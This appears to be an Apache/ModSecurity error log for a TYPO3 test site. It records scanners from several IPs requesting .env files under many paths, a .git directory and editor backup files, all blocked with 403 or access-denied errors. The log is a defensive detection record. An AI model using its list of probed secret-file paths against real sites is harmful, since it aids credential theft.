[Sat Nov 22 00:06:40.291257 2025] [:error] [pid 243340] [client 3.9.175.83:41948] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.backup"] [unique_id "aSDwgJeLEhOLAInnw0NqigAAAAA"]
[Sat Nov 22 00:06:40.367303 2025] [authz_core:error] [pid 243398] [client 3.9.175.83:42046] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/info.php.swp
[Sat Nov 22 00:06:40.381819 2025] [authz_core:error] [pid 243342] [client 3.9.175.83:41966] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test.php~
[Sat Nov 22 00:06:48.748966 2025] [authz_core:error] [pid 243406] [client 3.9.175.83:44610] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test.php.swp
[Sat Nov 22 00:06:57.082298 2025] [authz_core:error] [pid 243420] [client 3.9.175.83:48844] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Nov 22 02:14:22.045195 2025] [:error] [pid 243343] [client 2.57.122.173:58422] [client 2.57.122.173] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSEOboNKGNllPFPT2VHkswAAAAY"]
[Sat Nov 22 02:14:22.045488 2025] [:error] [pid 243343] [client 2.57.122.173:58422] [client 2.57.122.173] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSEOboNKGNllPFPT2VHkswAAAAY"]
[Sat Nov 22 02:14:22.045669 2025] [:error] [pid 243343] [client 2.57.122.173:58422] [client 2.57.122.173] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSEOboNKGNllPFPT2VHkswAAAAY"]
[Sat Nov 22 15:50:02.886416 2025] [authz_core:error] [pid 250889] [client 172.70.250.214:9686] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 23 04:50:44.480812 2025] [:error] [pid 266317] [client 45.148.10.143:47094] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSKElM8Kqje0bNpeh30-JAAAAAA"]
[Sun Nov 23 04:50:44.482051 2025] [:error] [pid 266317] [client 45.148.10.143:47094] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSKElM8Kqje0bNpeh30-JAAAAAA"]
[Sun Nov 23 04:50:44.482257 2025] [:error] [pid 266317] [client 45.148.10.143:47094] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSKElM8Kqje0bNpeh30-JAAAAAA"]
[Sun Nov 23 04:50:48.234931 2025] [:error] [pid 266318] [client 45.148.10.143:47108] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSKEmDKJUjhaVaDyHaHyvAAAAAE"]
[Sun Nov 23 04:50:48.235283 2025] [:error] [pid 266318] [client 45.148.10.143:47108] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSKEmDKJUjhaVaDyHaHyvAAAAAE"]
[Sun Nov 23 04:50:48.235456 2025] [:error] [pid 266318] [client 45.148.10.143:47108] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSKEmDKJUjhaVaDyHaHyvAAAAAE"]
[Sun Nov 23 04:51:36.510817 2025] [:error] [pid 266320] [client 45.148.10.143:50624] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aSKEyJI5j_0ed6X_RLk8YgAAAAM"]
[Sun Nov 23 04:51:36.511074 2025] [:error] [pid 266320] [client 45.148.10.143:50624] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aSKEyJI5j_0ed6X_RLk8YgAAAAM"]
[Sun Nov 23 04:51:36.511251 2025] [:error] [pid 266320] [client 45.148.10.143:50624] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aSKEyJI5j_0ed6X_RLk8YgAAAAM"]
[Sun Nov 23 04:51:48.856024 2025] [:error] [pid 266343] [client 45.148.10.143:55130] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aSKE1G9UlIruL7JTxnXgUwAAAAY"]
[Sun Nov 23 04:51:48.856299 2025] [:error] [pid 266343] [client 45.148.10.143:55130] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aSKE1G9UlIruL7JTxnXgUwAAAAY"]
[Sun Nov 23 04:51:48.856495 2025] [:error] [pid 266343] [client 45.148.10.143:55130] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aSKE1G9UlIruL7JTxnXgUwAAAAY"]
[Sun Nov 23 04:52:07.646561 2025] [:error] [pid 266319] [client 45.148.10.143:46062] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aSKE595ex8tKkYIgrhsCFAAAAAI"]
[Sun Nov 23 04:52:07.646820 2025] [:error] [pid 266319] [client 45.148.10.143:46062] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aSKE595ex8tKkYIgrhsCFAAAAAI"]
[Sun Nov 23 04:52:07.646995 2025] [:error] [pid 266319] [client 45.148.10.143:46062] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aSKE595ex8tKkYIgrhsCFAAAAAI"]
[Sun Nov 23 04:52:20.704137 2025] [:error] [pid 266318] [client 45.148.10.143:50082] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSKE9DKJUjhaVaDyHaHyvgAAAAE"]
[Sun Nov 23 04:52:20.704402 2025] [:error] [pid 266318] [client 45.148.10.143:50082] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSKE9DKJUjhaVaDyHaHyvgAAAAE"]
[Sun Nov 23 04:52:20.704598 2025] [:error] [pid 266318] [client 45.148.10.143:50082] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSKE9DKJUjhaVaDyHaHyvgAAAAE"]
[Sun Nov 23 04:52:36.494303 2025] [:error] [pid 266320] [client 45.148.10.143:40690] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSKFBJI5j_0ed6X_RLk8YwAAAAM"]
[Sun Nov 23 04:52:36.494596 2025] [:error] [pid 266320] [client 45.148.10.143:40690] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSKFBJI5j_0ed6X_RLk8YwAAAAM"]
[Sun Nov 23 04:52:36.494783 2025] [:error] [pid 266320] [client 45.148.10.143:40690] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSKFBJI5j_0ed6X_RLk8YwAAAAM"]
[Sun Nov 23 04:52:48.339909 2025] [:error] [pid 266343] [client 45.148.10.143:57938] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSKFEG9UlIruL7JTxnXgVAAAAAY"]
[Sun Nov 23 04:52:48.340155 2025] [:error] [pid 266343] [client 45.148.10.143:57938] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSKFEG9UlIruL7JTxnXgVAAAAAY"]
[Sun Nov 23 04:52:48.340357 2025] [:error] [pid 266343] [client 45.148.10.143:57938] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSKFEG9UlIruL7JTxnXgVAAAAAY"]
[Sun Nov 23 04:52:48.618238 2025] [:error] [pid 266343] [client 45.148.10.143:57938] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aSKFEG9UlIruL7JTxnXgVQAAAAY"]
[Sun Nov 23 04:52:48.618578 2025] [:error] [pid 266343] [client 45.148.10.143:57938] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aSKFEG9UlIruL7JTxnXgVQAAAAY"]
[Sun Nov 23 04:52:48.618796 2025] [:error] [pid 266343] [client 45.148.10.143:57938] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aSKFEG9UlIruL7JTxnXgVQAAAAY"]
[Sun Nov 23 04:52:48.932097 2025] [:error] [pid 266343] [client 45.148.10.143:57938] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aSKFEG9UlIruL7JTxnXgVgAAAAY"]
[Sun Nov 23 04:52:48.932352 2025] [:error] [pid 266343] [client 45.148.10.143:57938] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aSKFEG9UlIruL7JTxnXgVgAAAAY"]
[Sun Nov 23 04:52:48.932550 2025] [:error] [pid 266343] [client 45.148.10.143:57938] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aSKFEG9UlIruL7JTxnXgVgAAAAY"]
[Sun Nov 23 04:52:49.546824 2025] [:error] [pid 266343] [client 45.148.10.143:57938] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aSKFEW9UlIruL7JTxnXgVwAAAAY"]
[Sun Nov 23 04:52:49.547064 2025] [:error] [pid 266343] [client 45.148.10.143:57938] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aSKFEW9UlIruL7JTxnXgVwAAAAY"]
[Sun Nov 23 04:52:49.547256 2025] [:error] [pid 266343] [client 45.148.10.143:57938] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aSKFEW9UlIruL7JTxnXgVwAAAAY"]
[Sun Nov 23 04:53:00.042126 2025] [:error] [pid 266317] [client 45.148.10.143:55806] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aSKFHM8Kqje0bNpeh30-JgAAAAA"]
[Sun Nov 23 04:53:00.042485 2025] [:error] [pid 266317] [client 45.148.10.143:55806] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aSKFHM8Kqje0bNpeh30-JgAAAAA"]
[Sun Nov 23 04:53:00.042719 2025] [:error] [pid 266317] [client 45.148.10.143:55806] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aSKFHM8Kqje0bNpeh30-JgAAAAA"]
